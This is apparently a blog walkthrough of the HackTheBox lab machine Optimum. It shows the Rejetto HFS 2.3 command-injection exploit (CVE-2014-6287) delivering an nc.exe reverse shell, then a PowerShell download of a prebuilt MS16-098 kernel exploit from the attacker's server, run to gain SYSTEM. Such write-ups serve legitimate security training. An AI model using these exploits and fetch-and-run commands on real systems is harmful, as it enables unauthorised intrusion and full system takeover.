Port 53

Tech notes for tomorrow

HackTheBox Optimum Walkthrough


https://app.hackthebox.eu/machines/Optimum

It's been a while. I sat the Network Specialist exam and bombed the afternoon I paper, among other things...

This time I'm writing a walkthrough for HackTheBox Optimum.
When the privilege escalation wasn't working, the machine icon's double peace sign really got on my nerves... lol.
The user flag was easy, but root was my first time getting it with a PoC, so it was hard.


Port scan

Run a normal port scan. I also ran autorecon just in case. Note that `nmap -A` with no port specification only covers nmap's default top 1,000 TCP ports (hence "Not shown: 999 filtered ports" below); a full `-p-` sweep is worth running in the background so nothing on a high port is missed.

The result shows only port 80 open, running HttpFileServer httpd 2.3 (Rejetto HFS).
The OS guess points at Windows Server 2012 R2, although nmap flags it as unreliable because it had no closed port to fingerprint against; the systeminfo output later confirms it.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -A 10.10.10.8                                                      
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-28 21:37 JST
Nmap scan report for 10.10.10.8
Host is up (0.082s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   80.64 ms 10.10.14.1
2   80.65 ms 10.10.10.8

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.55 seconds

Web server enumeration

Opening it in a browser gives the HFS front page: a file listing with an upload/search UI.

[Screenshot: HFS 2.3 front page in the browser]

The gobuster, nikto and whatweb results collected by autorecon didn't turn up much,
so I went straight to looking for vulnerabilities in HFS 2.3 itself. Since the Server header already gives the exact version, checking for known exploits before brute-forcing directories is the faster route here.

Running the PoC

Searching for an HFS 2.3 PoC turned up an interesting one on Exploit-DB: a Python script that gives RCE.
The underlying bug is CVE-2014-6287: in HFS 2.3x before 2.3c, the findMacroMarker function stops scanning at a NUL byte, so a search query containing `%00` followed by an HFS macro such as `{.exec|...}` reaches the macro engine unfiltered and executes commands on the server.

https://www.exploit-db.com/exploits/39161/

There were a few preparation steps and caveats for using it, though:

  1. Place nc.exe in /var/www/html beforehand and serve that directory over HTTP on port 80 (the PoC hard-codes http://<LHOST>/nc.exe with no port).
  2. Edit the local address (ip_addr) and port (local_port) in the PoC, and listen with nc on that port.
  3. The PoC may not work on the first try, so run it a few times.

Put the nc binary in the public directory.
I used the Windows nc.exe from /usr/share/windows-binaries/nc.exe.

┌──(kali㉿kali)-[~/results/Optimum/scans]
└─$ sudo cp /usr/share/windows-binaries/nc.exe /var/www/html/                                   
[sudo] password for kali:
                                                                                                    
┌──(kali㉿kali)-[~/results/Optimum/scans]
└─$ ls /var/www/html 
index.html  index.nginx-debian.html  nc.exe

Start an HTTP server in the public directory, on port 80. (This is the Python 2 module; on a Python 3-only system the equivalent is `python3 -m http.server 80`.)

┌──(kali㉿kali)-[/var/www/html]
└─$ sudo python -m SimpleHTTPServer 80                                                          
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 80 ...

Set up a netcat listener for the reverse shell.

┌──(kali㉿kali)-[~]
└─$ nc -vlnp 1234
listening on [any] 1234 ...

Now run it (several times, checking the listener after each run).

┌──(kali㉿kali)-[~/Downloads]
└─$ python 39161.py 10.10.10.8 80 

It connected back. Nice.

┌──(kali㉿kali)-[~]
└─$ nc -vlnp 1234
listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.8] 49194
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>

The shell landed directly in the user's Desktop directory. User flag found.

C:\Users\kostas\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D0BC-0196

 Directory of C:\Users\kostas\Desktop

05/05/2021  01:00     <DIR>          .
05/05/2021  01:00     <DIR>          ..
18/03/2017  03:11              760.320 hfs.exe
18/03/2017  03:13                   32 user.txt.txt
               2 File(s)        760.352 bytes
               2 Dir(s)  31.860.166.656 bytes free


C:\Users\kostas\Desktop>type user.txt.txt

Root isn't reachable without privilege escalation...

C:\Users\kostas\Desktop>whoami
whoami
optimum\kostas


C:\Users>cd Administrator
cd Administrator
Access is denied.

Privilege escalation

No Metasploit this time, so what now? Some searching turned up a handy tool.

Windows-Exploit-Suggester: feed it the output of systeminfo and it cross-references the installed hotfixes with Microsoft's security bulletin data, then lists the bulletins that appear to be missing, with links to Exploit-DB PoCs and Metasploit modules.
Confirmed working under Python 2, but it's a bit fiddly to use.

github.com (Windows-Exploit-Suggester repository)

To read the bulletin data (an Excel spreadsheet) the tool needs the Python xlrd library,
but xlrd 2.0 dropped xlsx support, so it won't work until xlrd is downgraded to 1.1.0...

xlrd.readthedocs.io

github.com

Install xlrd for the tool (this upgrade step turned out to be unnecessary; pinning 1.1.0 directly, as in the next step, is all that's needed):

┌──(kali㉿kali)-[~/tools/Windows-Exploit-Suggester-master]
└─$ pip install xlrd --upgrade                                                                  2 ⨯
Requirement already satisfied: xlrd in /usr/lib/python3/dist-packages (1.2.0)
Collecting xlrd
  Downloading xlrd-2.0.1-py2.py3-none-any.whl (96 kB)
     |████████████████████████████████| 96 kB 4.5 MB/s 
Installing collected packages: xlrd
Successfully installed xlrd-2.0.1

Then downgrade xlrd to 1.1.0 under Python 2, which is what the script runs on:

┌──(kali㉿kali)-[~/tools/Windows-Exploit-Suggester-master]
└─$ pip2 install xlrd==1.1.0                                                                     1 ⨯
Defaulting to user installation because normal site-packages is not writeable
Collecting xlrd==1.1.0
  Downloading xlrd-1.1.0-py2.py3-none-any.whl (103 kB)
     |████████████████████████████████| 103 kB 5.8 MB/s 
Installing collected packages: xlrd
  Attempting uninstall: xlrd
    Found existing installation: xlrd 2.0.1
    Uninstalling xlrd-2.0.1:
      Successfully uninstalled xlrd-2.0.1
Successfully installed xlrd-1.1.0

Update the vulnerability data (the database is written out as an .xls file):

┌──(kali㉿kali)-[~/tools/Windows-Exploit-Suggester-master]
└─$ python windows-exploit-suggester.py --update     
[*] initiating winsploit version 3.3...
[+] writing to file 2021-04-28-mssb.xls
[*] done

Run systeminfo on Optimum and save the output to a text file on Kali (optimum_systeminfo.txt below).

C:\Users\kostas\Desktop>systeminfo
systeminfo

Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00252-70000-00000-AA535
Original Install Date:     18/3/2017, 1:51:36
System Boot Time:          5/5/2021, 12:59:00
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest
Total Physical Memory:     4.095 MB
Available Physical Memory: 3.394 MB
Virtual Memory: Max Size:  5.503 MB
Virtual Memory: Available: 4.841 MB
Virtual Memory: In Use:    662 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              \\OPTIMUM
Hotfix(s):                 31 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB2919355
                           [04]: KB2920189
                           [05]: KB2928120
                           [06]: KB2931358
                           [07]: KB2931366
                           [08]: KB2933826
                           [09]: KB2938772
                           [10]: KB2949621
                           [11]: KB2954879
                           [12]: KB2958262
                           [13]: KB2958263
                           [14]: KB2961072
                           [15]: KB2965500
                           [16]: KB2966407
                           [17]: KB2967917
                           [18]: KB2971203
                           [19]: KB2971850
                           [20]: KB2973351
                           [21]: KB2973448
                           [22]: KB2975061
                           [23]: KB2976627
                           [24]: KB2977629
                           [25]: KB2981580
                           [26]: KB2987107
                           [27]: KB2989647
                           [28]: KB2998527
                           [29]: KB3000850
                           [30]: KB3003057
                           [31]: KB3014442
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.8
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
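Before running the tool, it's worth seeing what it actually does with this output, as an added example (my own code, not Windows-Exploit-Suggester's): parse the OS name/build and the KB list out of systeminfo, then report every bulletin whose KB is absent. The bulletin-to-KB table is a constructed five-entry excerpt taken from the suggester output further down (the real tool loads Microsoft's full bulletin spreadsheet, which is why it needs xlrd), and SAMPLE is a shortened copy of the systeminfo above.

```python
#!/usr/bin/env python3
"""
The core of what Windows-Exploit-Suggester does: parse a systeminfo dump for
the OS build and installed KBs, then list bulletins whose KB is missing.
"""
import re

# Constructed bulletin -> (KB, short description) table; five entries copied
# from the suggester output on this page.  The real tool loads Microsoft's
# full bulletin spreadsheet (hence the xlrd dependency).
BULLETINS = {
    "MS16-135": ("KB3199135", "Windows Kernel-Mode Drivers EoP"),
    "MS16-098": ("KB3178466", "win32k RGNOBJ integer overflow EoP"),
    "MS16-032": ("KB3143141", "Secondary Logon handle EoP"),
    "MS15-051": ("KB3057191", "win32k ClientCopyImage EoP"),
    "MS14-058": ("KB3000061", "win32k TrackPopupMenu EoP"),
}

# Constructed, shortened copy of the Optimum systeminfo output.
SAMPLE = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2959936
                           [02]: KB3000850
                           [03]: KB3014442
Network Card(s):           1 NIC(s) Installed.
"""

FIELD_RE = re.compile(r"^([A-Za-z][^:]*):\s+(.*)$")   # "Key:   value" lines
KB_RE = re.compile(r"\bKB\d{6,7}\b")


def parse_systeminfo(text: str):
    """Return (os_name, build_number, set_of_installed_kbs)."""
    fields = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)   # indented "[01]: KB..." lines don't match
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    build = re.search(r"Build (\d+)", fields.get("OS Version", ""))
    return (
        fields.get("OS Name", "unknown"),
        int(build.group(1)) if build else None,
        set(KB_RE.findall(text)),
    )


def missing_bulletins(installed_kbs, bulletins=BULLETINS):
    """Bulletins whose KB is not installed, newest bulletin first.

    Caveat: like the real tool, this only looks at the KB numbers systeminfo
    prints and does not model patch supersedence, so expect false positives.
    """
    return sorted(
        ((bid, kb, desc) for bid, (kb, desc) in bulletins.items()
         if kb not in installed_kbs),
        reverse=True,
    )


if __name__ == "__main__":
    name, build, kbs = parse_systeminfo(SAMPLE)
    print(f"{name} build {build}, {len(kbs)} hotfixes listed")
    for bid, kb, desc in missing_bulletins(kbs):
        print(f"  {bid} ({kb}) not installed: {desc}")
```

Run against the full systeminfo dump instead of SAMPLE and the output is the same kind of list the suggester prints below, minus the exploit links. The "246 remaining vulns" it reports for a box with 31 hotfixes is a reminder of how noisy KB-only matching is; the author's approach of trying candidates from the top is the practical response.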

With everything in place, finally run Windows-Exploit-Suggester...
I burned a good hour on the setup... exhausting...

Run it under Python 2:

┌──(kali㉿kali)-[~/tools/Windows-Exploit-Suggester-master]
└─$ python windows-exploit-suggester.py --database 2021-04-28-mssb.xls --systeminfo optimum_systeminfo.txt 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 246 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
[*] 
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]   https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]   https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]   https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*] 
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*]   https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*] 
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato
[*]   https://github.com/Kevin-Robertson/Tater
[*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*] 
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*]   https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*]   https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*] 
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*]   https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
[*] 
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[*]   https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
[*]   https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
[*]   https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)
[*] 
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[*]   https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
[*]   https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
[*] 
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[*]   Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC
[*] 
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[*]   https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*]   https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
[*] 
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[*]   https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC
[*]   https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS15-134), PoC
[*] 
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[*]   https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
[*] 
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[*]   https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC
[*] 
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[*]   https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC
[*] 
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[*]   https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation, PoC
[*]   https://www.exploit-db.com/exploits/38199/ -- Windows NtUserGetClipboardAccessToken Token Leak, PoC
[*] 
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical
[*]   https://www.exploit-db.com/exploits/38222/ -- MS15-078 Microsoft Windows Font Driver Buffer Overflow
[*] 
[E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important
[*]   https://www.exploit-db.com/exploits/37052/ -- Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052), PoC
[*] 
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]   https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]   https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*] 
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*]   https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*] 
[E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important
[*]   http://www.exploit-db.com/exploits/35661/ -- Windows 8.1 (32/64 bit) - Privilege Escalation (ahcache.sys/NtApphelpCacheControl), PoC
[*] 
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*]   http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*] 
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]   https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*]   http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*]   http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*]   http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[*]   http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC
[*]   http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*]   http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*] 
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[*] done

It recommended a lot. Working down from the top, I settled on the MS16-098 PoC for privilege escalation. (The suggester judges only by the KB numbers listed in systeminfo and doesn't account for supersedence, so many of these are false positives; trying candidates in order is the practical approach.)

https://www.exploit-db.com/exploits/41020/

The PoC is written in C, so strictly it needs compiling, but a comment in the PoC gives the location of a prebuilt binary, so I gratefully used that.
To transfer it to Optimum, put it in the web root and have Optimum download it.
Two practical notes: a prebuilt exploit binary from a third-party repository is fine on a lab box like this one, but on a real engagement build it from source yourself; and MS16-098 is a win32k kernel exploit, so a failed attempt can crash the target. Check that the copy on the target matches the one you served (`sha256sum 41020.exe` on Kali, `certutil -hashfile 41020.exe SHA256` on Windows) before running it. Note also that wget's output-file option is capital `-O`; lowercase `-o` sets the log file.

┌──(kali㉿kali)-[/var/www/html]
└─$ sudo wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe -O 41020.exe
[sudo] password for kali:

┌──(kali㉿kali)-[/var/www/html]
└─$ sudo chmod 755 41020.exe                       
                                                                                                    
┌──(kali㉿kali)-[/var/www/html]
└─$ ls
41020.exe  index.html  index.nginx-debian.html  nc.exe

┌──(kali㉿kali)-[/var/www/html]
└─$ sudo python -m SimpleHTTPServer 80                                                          
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 80 ...

Download the PoC onto Optimum with wget via PowerShell (there wget is an alias of Invoke-WebRequest, hence -outfile).
Running the PoC then spawns a new cmd.exe running as SYSTEM.

C:\Users\kostas\Desktop>powershell wget http://10.10.14.2/41020.exe -outfile 41020.exe
powershell wget http://10.10.14.2/41020.exe -outfile 41020.exe

C:\Users\kostas\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D0BC-0196

 Directory of C:\Users\kostas\Desktop

05/05/2021  02:42     <DIR>          .
05/05/2021  02:42     <DIR>          ..
05/05/2021  02:42                1.988 41020.exe
18/03/2017  03:11              760.320 hfs.exe
18/03/2017  03:13                   32 user.txt.txt
               3 File(s)        762.340 bytes
               2 Dir(s)  31.896.416.256 bytes free


C:\Users\kostas\Desktop>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
nt authority\system

Root flag found (the SYSTEM shell can now read the Administrator desktop).

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D0BC-0196

 Directory of C:\Users\Administrator\Desktop

18/03/2017  03:14     <DIR>          .
18/03/2017  03:14     <DIR>          ..
18/03/2017  03:14                   32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  31.883.894.784 bytes free


C:\Users\Administrator\Desktop>type root.txt
type root.txt